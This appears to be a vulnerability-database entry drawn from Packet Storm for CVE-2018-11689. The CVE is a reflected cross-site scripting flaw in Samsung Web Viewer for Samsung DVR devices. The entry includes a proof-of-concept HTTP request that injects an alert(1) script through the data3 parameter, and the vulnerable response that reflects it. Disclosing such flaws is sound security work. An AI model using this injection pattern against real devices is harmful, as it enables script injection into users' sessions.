Details of VAR-E-201806-0158

ID

VAR-E-201806-0158

CVE

cve_id:

CVE-2018-11689

Trust: 0.5

sources: PACKETSTORM: 148183

TITLE

Samsung Web Viewer For Samsung DVR Cross Site Scripting

Trust: 0.5

sources: PACKETSTORM: 148183

DESCRIPTION

Samsung Web Viewer for Samsung DVR suffers from a cross site scripting vulnerability.

Trust: 0.5

sources: PACKETSTORM: 148183

AFFECTED PRODUCTS

vendor:

samsung

model:

web viewer for samsung dvr

scope:

version:

Trust: 0.5

sources: PACKETSTORM: 148183

EXPLOIT

I. VULNERABILITY
-------------------------
Samsung Web Viewer for Samsung DVR Reflected Cross Site Scripting (XSS)

II. CVE REFERENCE
-------------------------
CVE-2018-11689

III. REFERENCES
-------------------------
https://vulmon.com/vulnerabilitydetails?qid=CVE-2018-11689

IV. CREDIT
-------------------------
Yavuz Atlas - Biznet Bilisim
http://www.biznet.com.tr/biznet-guvenlik-duyurulari

V. DESCRIPTION
-------------------------
Samsung Web Viewer for Samsung DVR devices (Samsung Smart Viewer) is
vulnerable to cross-site scripting. The vulnerability allows remote
attackers to inject arbitrary web script or HTML.

VI. PROOF OF CONCEPT
-------------------------
Request:
GET /cgi-bin/webviewer_login_page?lang=tu&loginvalue=0&port=0&data3=</script><script>alert(1)</script>
HTTP/1.1
Host: 10.10.10.10

Response:
HTTP/1.1 200 OK
X-UA-Compatible: IE=EmulateIE9, requiresActiveX=true
Content-type: text/html
Connection: close
Date: Wed, 23 May 2018 11:14:09 GMT
Server: lighttpd/1.4.35
Content-Length: 10797
a|
function setcookie(){
var val_rand = Math.random();
if(is_close_user_session == true)
document.login_page_submit.close_user_session.value = 1;
else
document.login_page_submit.close_user_session.value = 0;
document.login_page_submit.data1.value =
data_parser(document.login_page.data1.value);
document.login_page_submit.data2.value =
do_encrypt(document.login_page.data2.value);
document.login_page_submit.data3.value = </script><script>alert(1)</script>;
document.login_page_submit.data4.value = val_rand;
document.login_page_submit.submit();
}
a|

Trust: 0.5

sources: PACKETSTORM: 148183

EXPLOIT HASH

LOCAL

SOURCE

md5:	4c1965dce41d570dded8761c42edd7e7
sha-1:	227c5b816b8e2fa48b0004b82d4a831cf27a8db2
sha-256:	28ee384b12e160b3c5e4f50d45108e9755237ea04aa1c17e88fad851fbac65a8

md5:	4c1965dce41d570dded8761c42edd7e7

Trust: 0.5

sources: PACKETSTORM: 148183

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 148183

TYPE

xss

Trust: 0.5

sources: PACKETSTORM: 148183

CREDITS

Yavuz Atlas

Trust: 0.5

sources: PACKETSTORM: 148183

EXTERNAL IDS

db:	NVD	id:	CVE-2018-11689	Trust: 0.5
db:	PACKETSTORM	id:	148183	Trust: 0.5

sources: PACKETSTORM: 148183

REFERENCES

url:

https://nvd.nist.gov/vuln/detail/cve-2018-11689

Trust: 0.5

sources: PACKETSTORM: 148183

SOURCES

db:

PACKETSTORM

id:

148183

LAST UPDATE DATE

2022-07-27T09:18:18.378000+00:00

SOURCES RELEASE DATE

db:

PACKETSTORM

id:

148183

date:

2018-06-13T22:22:22

ID

CVE

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT HASH

LOCAL

SOURCE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES RELEASE DATE